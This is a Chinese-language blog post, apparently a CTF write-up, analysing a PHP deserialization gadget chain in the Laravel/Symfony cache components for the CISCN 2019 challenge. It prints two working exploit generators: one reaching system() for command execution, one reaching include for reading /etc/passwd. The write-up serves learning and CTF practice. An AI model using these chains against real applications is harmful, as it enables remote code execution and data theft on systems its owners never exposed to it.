<!doctype html>
<html lang="en"><head><meta charset="utf-8"><meta name="generator" content="Hexo 4.2.1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta><meta name="keywords" content="null"><meta name="description" content="[toc]这几天总想着审点反序列化的链子，结果刚好在buu上看到一道不错的题，刚好练练手。"><meta name="author" content="Katharsis"><title>ciscn2019 laravel反序列化利用链 - Kath4rs1s</title><meta description="[toc]这几天总想着审点反序列化的链子，结果刚好在buu上看到一道不错的题，刚好练练手。"><meta property="og:type" content="article"><meta property="og:title" content="ciscn2019 laravel反序列化利用链"><meta property="og:url" content="http://yoursite.com/2020/09/10/ciscn-laravel1/"><meta property="og:site_name" content="Katharsis"><meta property="og:description" content="[toc]这几天总想着审点反序列化的链子，结果刚好在buu上看到一道不错的题，刚好练练手。"><meta property="og:locale" content="en_US"><meta property="article:published_time" content="2020-09-10T11:16:48.000Z"><meta property="article:modified_time" content="2020-09-11T02:05:09.602Z"><meta property="article:author" content="Katharsis"><meta property="twitter:card" content="summary"><meta property="twitter:image" content="http://yoursite.com/img/avatar.png"><script type="application/ld+json">{"@context":"https://schema.org","@type":"BlogPosting","mainEntityOfPage":{"@type":"WebPage","@id":"http://yoursite.com/2020/09/10/ciscn-laravel1/"},"headline":"ciscn2019 laravel反序列化利用链","image":["http://yoursite.com/img/avatar.png"],"datePublished":"2020-09-10T11:16:48.000Z","dateModified":"2020-09-11T02:05:09.602Z","author":{"@type":"Person","name":"Katharsis"},"description":"[toc]这几天总想着审点反序列化的链子，结果刚好在buu上看到一道不错的题，刚好练练手。"}</script><link rel="alternative" href="/atom.xml" title="Kath4rs1s" type="application/atom+xml"><link rel="icon" href="/img/favicon.png"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/font-awesome/5.12.0/css/all.min.css"><link rel="stylesheet" href="https://fonts.loli.net/css?family=Ubuntu:400,600|Source+Code+Pro|Monda:300,300italic,400,400italic,700,700italic|Roboto Slab:300,300italic,400,400italic,700,700italic|Microsoft YaHei:300,300italic,400,400italic,700,700italic|PT Mono:300,300italic,400,400italic,700,700italic&amp;amp;subset=latin,latin-ext|Inconsolata|Itim|Lobster.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/highlight.js/9.12.0/styles/atom-one-dark.min.css"><style>body>.footer,body>.navbar,body>.section{opacity:0}</style><!--!--><!--!--><script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" defer></script><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/css/lightgallery.min.css"><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/css/justifiedGallery.min.css"><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/pace/1.0.2/pace.min.js"></script><link rel="stylesheet" href="/css/style.css"><script src="https://cdnjs.loli.net/ajax/libs/jquery/3.3.1/jquery.min.js"></script><script src="/js/globalUtils.js"></script></head><body class="is-3-column has-navbar-fixed-top"><nav class="navbar navbar-main is-fixed-top"><div class="container"><div class="navbar-brand justify-content-center"><a class="navbar-item navbar-logo" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a></div><div class="navbar-menu"><div class="navbar-start"><a class="navbar-item" href="/">首页</a><a class="navbar-item" href="/archives">归档</a><a class="navbar-item" href="/categories">分类</a><a class="navbar-item" href="/about">关于</a></div><div class="navbar-end"><a class="navbar-item is-hidden-tablet catalogue" title="Catalogue" href="javascript:;"><i class="fas fa-list-ul"></i></a><a class="navbar-item search" title="Search" href="javascript:;"><i class="fas fa-search"></i></a><a class="navbar-item" id="night-nav" title="Night Mode" href="javascript:;"><i class="fas fa-moon" id="night-icon"></i></a></div></div></div></nav><script type="text/javascript" src="/js/theme-setting.js"></script><section class="section"><div class="container"><div class="columns"><div class="column order-2 column-main is-8-tablet is-8-desktop is-9-widescreen"><div class="card"><article class="card-content article" role="article"><div class="article-meta size-small is-uppercase level is-mobile"><div class="level-left"><i class="far fa-calendar-plus"> </i>2020-09-10  <span class="level-item"><i class="far fa-clock"> </i>8 m  <i class="fas fa-pencil-alt"> </i>1.2 k</span><span class="level-item" id="busuanzi_container_page_pv"><i class="far fa-eye"></i>&nbsp;&nbsp;<span id="busuanzi_value_page_pv">0</span> visits</span></div></div><h1 class="title is-3 is-size-4-mobile">ciscn2019 laravel反序列化利用链</h1><div class="content"><p>[toc]<br>这几天总想着审点反序列化的链子，结果刚好在buu上看到一道不错的题，刚好练练手。<a id="more"></a><br>打开页面就是简短的代码告诉我们是反序列化，然后根据提示下载下来源码。用的是laravel框架，讲实话这种框架的代码好难看懂，不懂这个<code>index.php</code>是怎么执行的，然后边查资料边看终于懂了一点点。</p>
<h3 id="路由信息"><a href="#路由信息" class="headerlink" title="路由信息"></a>路由信息</h3><p>首先要查看路由信息，所有的Laravel路由都是在routes目录下的路由文件中，这些文件通过框架自动加载。routes/web.php文件定义了web界面的路由，这些路由被分配了web中间件组，从而可以提供session和csrf防护等功能。routes/api.php中的路由是无状态的，被分配了 api 中间件组。<br>对大多数应用而言，都是从 routes/web.php 文件开始定义路由。</p>
<p><img src="/images/ciscn_laravel/20200910194248.png" alt=""></p>
<p>我们可以看到在web.php中自动加载了IndexController类中的index方法。明白了他为什么这样运行之后就可以开始看代码了。</p>
<h3 id="反序列化利用"><a href="#反序列化利用" class="headerlink" title="反序列化利用"></a>反序列化利用</h3><p><img src="/images/ciscn_laravel/20200910194740.png" alt=""></p>
<p>很明了的反序列化。<br>看这种反序列化一般都是直接全局搜索魔法函数，看看有没有可用的 <code>__destruct(),__wakeup(),__toString(),__call()</code> 等等。就先看__destruct()吧，一搜一堆，心态崩了，看了半天终于看到一个能用的，在TagAwareAdapter.php的<strong>TagAwareAdapter</strong>类里面。</p>
<p><img src="/images/ciscn_laravel/20200910195422.png" alt=""></p>
<p><strong>__destruct</strong>调用了 <code>commit</code> 方法，然后 <code>commit()</code> 又调用了 <code>invalidateTags()</code> 方法，跟进这个方法。<br><img src="/images/ciscn_laravel/20200910224023.png" alt=""><br>在第125行，<code>$this-&gt;pool-&gt;saveDeferred($item)</code>这种可以触发<code>__call</code>方法，但我把__call都看了一遍发现没有可以利用的。然后想到了可以调用别的类的<code>saveDeferred()</code>方法。然后全局搜索了一下这个方法找到两个可用的。<br>第一个是在 <code>ProxyAdapter.php</code> 中,第二个是在 <code>PhpArrayAdapter.php</code> 中，分别看一下这两个方法，也对应两个exp。</p>
<h4 id="ProxyAdapter-php"><a href="#ProxyAdapter-php" class="headerlink" title="ProxyAdapter.php"></a>ProxyAdapter.php</h4><p><img src="/images/ciscn_laravel/20200910224927.png" alt=""></p>
<p><img src="/images/ciscn_laravel/20200910225107.png" alt=""></p>
<p> <strong>saveDeferred()</strong> 先调用了 <strong>dosave()</strong> 方法，然后在 <strong>dosave()</strong> 的223行，也就是红框中的部分有任意函数执行，函数名是可控的，就是 <strong>$this-&gt;setInnerItem</strong> ，函数参数也是可控的。</p>
<p><img src="/images/ciscn_laravel/20200910225648.png" alt=""></p>
<p>当满足if条件的时候，会把 <strong>$item[“\0*\0innerItem”]</strong> 的值赋给 <strong>$innerItem</strong>。再往前看</p>
<p><img src="/images/ciscn_laravel/20200910225944.png" alt=""></p>
<p><strong>instanceof</strong>是检查一个变量是否是一个类的实例化。这个if语句就是，如果$item不是CacheItem类的实例化，就退出。只要赋值$item为CacheItem类的实例化即可。</p>
<p><img src="/images/ciscn_laravel/20200910231026.png" alt=""></p>
<p>system()有第二个参数，这个第二个参数的意思实际上是将执行结果保存到<strong>return_var</strong>变量,所以这只能是个变量名，这里把return_var的值直接放进函数里是不行的，我试了一下<strong>return_var</strong>参数是int型和数组型都可以，所以跟变量类型无关。<br>然后便可以写exp，要注意命名空间。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace Symfony\Component\Cache\Adapter &#123;</span><br><span class="line">	class ProxyAdapter&#123;</span><br><span class="line">		private $setInnerItem;</span><br><span class="line">		function __construct()&#123;</span><br><span class="line">			$this-&gt;setInnerItem &#x3D; &#39;system&#39;;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">namespace Symfony\Component\Cache &#123;</span><br><span class="line">	class CacheItem&#123;</span><br><span class="line">		protected $innerItem;</span><br><span class="line">		function __construct() &#123;</span><br><span class="line">			$this-&gt;innerItem &#x3D; &#39;ls&#39;;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">namespace Symfony\Component\Cache\Adapter &#123;</span><br><span class="line">	use Symfony\Component\Cache\CacheItem;</span><br><span class="line">	class TagAwareAdapter&#123;</span><br><span class="line">		private $deferred &#x3D; [];</span><br><span class="line">		private $pool;</span><br><span class="line">		function __construct()&#123;</span><br><span class="line">			$this-&gt;deferred &#x3D; array(&#39;123&#39;&#x3D;&gt; new CacheItem());</span><br><span class="line">			$this-&gt;pool &#x3D; new ProxyAdapter();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	$a &#x3D; new TagAwareAdapter();</span><br><span class="line">	echo urlencode(serialize($a));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h4 id="PhpArrayAdapter-php"><a href="#PhpArrayAdapter-php" class="headerlink" title="PhpArrayAdapter.php"></a>PhpArrayAdapter.php</h4><p>再来看第二个</p>
<p><img src="/images/ciscn_laravel/20200910231525.png" alt=""></p>
<p>调用了initialize()方法，跟进一下，在<strong>PhpArrayTrait</strong>类中，这里的<strong>trait</strong>是什么意思呢？</p>
<blockquote>
<p>Trait 是为类似 PHP 的单继承语言而准备的一种代码复用机制。Trait 为了减少单继承语言的限制，使开发人员能够自由地在不同层次结构内独立的类中复用 method。 Trait 和 Class 组合的语义定义了一种减少复杂性的方式，避免传统多继承和 Mixin 类相关典型问题。</p>
</blockquote>
<p>简单来说就是一种多继承的方式，<code>PhpArrayTrait</code>也就是<code>PhpArrayAdapter</code>的父类。当在子类中找不到方法时会自动进入父类中寻找，这也就是为什么跟进到的<code>initialize()</code>在PhpArrayTrait类中。<br>下面看一下这个方法。</p>
<p><img src="/images/ciscn_laravel/20200910232316.png" alt=""></p>
<p>中间的include参数中存在变量，存在任意文件包含。构造一下exp。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">namespace Symfony\Component\Cache &#123;</span><br><span class="line">	class CacheItem&#123;</span><br><span class="line">		protected $innerItem;</span><br><span class="line">		function __construct() &#123;</span><br><span class="line">			$this-&gt;innerItem &#x3D; &#39;ls&#39;;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">namespace Symfony\Component\Cache\Adapter &#123;</span><br><span class="line">	use Symfony\Component\Cache\CacheItem;</span><br><span class="line">	class PhpArrayAdapter&#123;</span><br><span class="line">		private $values;</span><br><span class="line">		private $file;</span><br><span class="line">		function __construct()&#123;</span><br><span class="line">			$this-&gt;values &#x3D; null;</span><br><span class="line">			$this-&gt;file &#x3D; &#39;&#x2F;etc&#x2F;passwd&#39;;</span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">	class TagAwareAdapter&#123;</span><br><span class="line">		private $deferred &#x3D; [];</span><br><span class="line">		private $pool;</span><br><span class="line">		function __construct()&#123;</span><br><span class="line">			$this-&gt;deferred &#x3D; array(&#39;123&#39;&#x3D;&gt; new CacheItem());</span><br><span class="line">			$this-&gt;pool &#x3D; new PhpArrayAdapter();</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	$a &#x3D; new TagAwareAdapter();</span><br><span class="line">	echo urlencode(serialize($a));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h3 id="结语"><a href="#结语" class="headerlink" title="结语"></a>结语</h3><p>到这里差不多就结束了，还是太菜了，得多审点链子，多多看代码。太菜了太菜了。</p>
</div><ul class="post-copyright"><li><strong>Post Title: </strong><a href="http://yoursite.com/2020/09/10/ciscn-laravel1/">ciscn2019 laravel反序列化利用链</a></li><li><strong>Post Author: </strong><a href="http://yoursite.com">Katharsis</a></li><li><strong>Post Link: </strong><a href="http://yoursite.com/2020/09/10/ciscn-laravel1/">http://yoursite.com/2020/09/10/ciscn-laravel1/</a></li><li><strong>Copyright Notice: </strong><span>All articles in this blog are licensed under <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh" rel="external nofollow" target="_blank">CC BY-NC-SA 4.0</a> unless stating additionally.</span></li></ul><div></div><link rel="stylesheet" href="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/css/share.min.css"><div class="social-share"></div><script src="https://cdnjs.loli.net/ajax/libs/social-share.js/1.0.16/js/social-share.min.js"></script></article></div><div class="card"><div class="card-content"><h3 class="menu-label has-text-centered">Like this article? Support the author with</h3><div class="buttons is-centered"></div></div></div><nav class="post-navigation mt-4 level is-mobile"><div class="level-end"><a class="article-nav-next level level-item link-muted" href="/2020/09/03/typecho-1-1/"><span class="level-item">typecho反序列化利用链分析</span><i class="level-item fas fa-chevron-right"></i></a></div></nav><!--!--></div><div class="column column-left is-4-tablet is-4-desktop is-4-widescreen  order-1 is-sticky"><div class="card widget toc-scroll" id="toc"><div class="card-content"><div class="menu"><h3 class="menu-label">Catalogue</h3><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-路由信息" href="#路由信息"><span>路由信息</span></a></li><li><a class="is-flex toc-item" id="toc-item-反序列化利用" href="#反序列化利用"><span>反序列化利用</span></a><ul class="menu-list toc"><li><a class="is-flex toc-item" id="toc-item-ProxyAdapter-php" href="#ProxyAdapter-php"><span>ProxyAdapter.php</span></a></li><li><a class="is-flex toc-item" id="toc-item-PhpArrayAdapter-php" href="#PhpArrayAdapter-php"><span>PhpArrayAdapter.php</span></a></li></ul></li><li><a class="is-flex toc-item" id="toc-item-结语" href="#结语"><span>结语</span></a></li></ul></div></div><script type="text/javascript" async>
        $(document).ready(function () { //参考自 https://github.com/ppoffice/hexo-theme-icarus/pull/616/files
            var observerTopMargin;
            var scrollObserver;
            var headerElems = $(".headerlink");
            var activeTocItem;
        
            function initIntersectionObserver(docHeight) {
                observerTopMargin = docHeight;
                scrollObserver = new IntersectionObserver(scrollCallBack,
                    {
                        root: null,  // viewpoint
                        rootMargin: docHeight + "px 0px -80% 0px"  // cover top 30% of viewport to the top of document
                    })
            }
        
            function scrollCallBack(entries, observer) {
                if ($(window).scrollTop() > observerTopMargin * 0.7) { 
                    // User somehow scroll to 70% of observerTopMargin (which is inited as 200% document height)
                    // Observer top margin need to extend to cover all the space to the top of the document
                    initIntersectionObserver(observerTopMargin * 2)
                    observer.disconnect();
                    return;
                }
                let toActive;
                if (entries[0].intersectionRatio == 1) {  // enter viewed area
                    let entry = entries.reduce((u, v) => (u.target.toc_id > v.target.toc_id ? u : v));  // get the lowest item
                    toActive = $("#toc-item-" + $(entry.target).attr("href").substr(1));
                } else {
                    let entry = entries.reduce((u, v) => (u.target.toc_id < v.target.toc_id ? u : v));  // get the highest item
                    let idx = Math.max(entry.target.toc_id - 1, 0);
                    toActive = $("#toc-item-" + $(headerElems[idx]).attr("href").substr(1));
                }
                if (activeTocItem) activeTocItem.removeClass("is-current");
                activeTocItem = toActive
                activeTocItem.addClass("is-current");
            }
        
            initIntersectionObserver($(document).height() * 2);
            headerElems.each(function (index, obj) {
                obj.toc_id = index;
                scrollObserver.observe(obj);
            })
        });</script></div><div class="card widget"><div class="card-content"><nav class="level"><div class="level-item has-text-centered flex-shrink-1"><div><figure class="image is-128x128 mx-auto mb-2"><img class="" src="/img/avatar.png" alt="Katharsis"></figure><p class="title is-size-4 is-block line-height-inherit">Katharsis</p><p class="is-size-6 is-block">^_^</p><p class="is-size-6 is-flex justify-content-center"><i class="fas fa-map-marker-alt mr-1"></i><span>中国</span></p></div></div></nav><nav class="level is-mobile"><div class="level-item has-text-centered is-marginless"><div><p class="heading">Posts</p><a href="/archives"><p class="title">15</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Categories</p><a href="/categories"><p class="title">6</p></a></div></div><div class="level-item has-text-centered is-marginless"><div><p class="heading">Tags</p><a href="/tags"><p class="title">2</p></a></div></div></nav><div class="level"><a class="level-item button is-primary is-rounded" href="/" target="_blank" rel="noopener">Follow</a></div><div class="level is-mobile"><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Github" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Weibo" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Email" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="Next" href="/null"><i></i></a><a class="level-item button is-transparent is-white is-marginless" target="_blank" rel="noopener" title="RSS" href="/null"><i></i></a></div></div></div></div></div></div></section><footer class="footer"><div class="container"><div class="level"><div class="level-start"><a class="footer-logo is-block mb-2" href="/"><img src="/img/123456.png" alt="Kath4rs1s" height="28"></a><p class="size-small"><span>&copy; 2020 Katharsis</span>  Powered by <a href="https://hexo.io/" target="_blank">Hexo</a> &amp; <a href="https://github.com/ppoffice/hexo-theme-icarus" target="_blank">Icarus</a>,Modify by <a href="https://github.com/removeif/hexo-theme-amazing" target="_blank">removeif</a> <br><span>© 版权说明：[本网站所有内容均收集于互联网或自己创作,<br />&nbsp;&nbsp;&nbsp;&nbsp;方便于网友与自己学习交流，如有侵权，请<a href="/message" target="_blank">留言</a>，立即处理]<br /></span><span><span id="statistic-times">loading...</span><script>function createTime(time) {
            var n = new Date(time);
            now.setTime(now.getTime() + 250),
                days = (now - n) / 1e3 / 60 / 60 / 24,
                dnum = Math.floor(days),
                hours = (now - n) / 1e3 / 60 / 60 - 24 * dnum,
                hnum = Math.floor(hours),
            1 == String(hnum).length && (hnum = "0" + hnum),
                minutes = (now - n) / 1e3 / 60 - 1440 * dnum - 60 * hnum,
                mnum = Math.floor(minutes),
            1 == String(mnum).length && (mnum = "0" + mnum),
                seconds = (now - n) / 1e3 - 86400 * dnum - 3600 * hnum - 60 * mnum,
                snum = Math.round(seconds),
            1 == String(snum).length && (snum = "0" + snum),
                document.getElementById("statistic-times").innerHTML = "❤️Site from <strong>"+time.split(" ")[0].replace(/\//g,".")+"</strong> has existed <strong>" + dnum + "</strong> d <strong>" + hnum + "</strong> h <strong>" + mnum + "</strong> m <strong>" + snum + "</strong> s！❤️";
        }var now = new Date();setInterval("createTime('2020/7/11 00:00:00')", 250,"");</script><br></span><div class="size-small"><span>❤️Thx <strong><span id="busuanzi_value_site_uv">99+</span></strong> users <strong><span id="busuanzi_value_site_pv">99+</span></strong> visited！❤️</span></div></p></div><div class="level-end"><div class="sideMusic"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/aplayer/dist/APlayer.min.css"><script src="/js/APlayer.min.js"></script><script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script><meting-js style="width: auto;height: 2000px;" server="netease" type="playlist" id="4978492128" theme="#2980b9" loop="all" autoplay="false" order="list" storageName="aplayer-setting" lrctype="0" list-max-height="400px" fixed="true"></meting-js></div></div></div></div></footer><script src="https://cdnjs.loli.net/ajax/libs/moment.js/2.22.2/moment-with-locales.min.js"></script><script>moment.locale("en");</script><script>var IcarusThemeSettings = {
            site: {
                url: 'http://yoursite.com',
                external_link: {"enable":true,"exclude":[]}
            },
            article: {
                highlight: {
                    clipboard: true,
                    fold: 'unfolded'
                }
            }
        };</script><script src="https://cdnjs.loli.net/ajax/libs/clipboard.js/2.0.4/clipboard.min.js" defer></script><script src="/js/animation.js"></script><a id="back-to-top" title="Back to Top" href="javascript:;"><i class="fas fa-chevron-up"></i></a><script src="/js/back-to-top.js" defer></script><!--!--><!--!--><script src="https://cdnjs.loli.net/ajax/libs/lightgallery/1.6.12/js/lightgallery-all.min.js" defer></script><script src="https://cdnjs.loli.net/ajax/libs/justifiedGallery/3.7.0/js/jquery.justifiedGallery.min.js" defer></script><!--!--><!--!--><!--!--><script src="/js/toc.js" defer></script><script src="/js/main.js" defer></script><link rel="stylesheet" href="/css/insight.css"><div class="searchbox ins-search"><div class="searchbox-container ins-search-container"><div class="searchbox-input-wrapper"><input class="searchbox-input ins-search-input" type="text" placeholder="Type something..."><span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span></div><div class="searchbox-result-wrapper ins-section-wrapper"><div class="ins-section-container"></div></div></div></div><script>(function (window) {
            var INSIGHT_CONFIG = {
                TRANSLATION: {
                    POSTS: 'Posts',
                    PAGES: 'Pages',
                    CATEGORIES: 'Categories',
                    TAGS: 'Tags',
                    UNTITLED: '(Untitled)',
                },
                CONTENT_URL: '/content.json',
            };
            window.INSIGHT_CONFIG = INSIGHT_CONFIG;
        })(window);</script><script src="/js/insight.js" defer></script></body></html>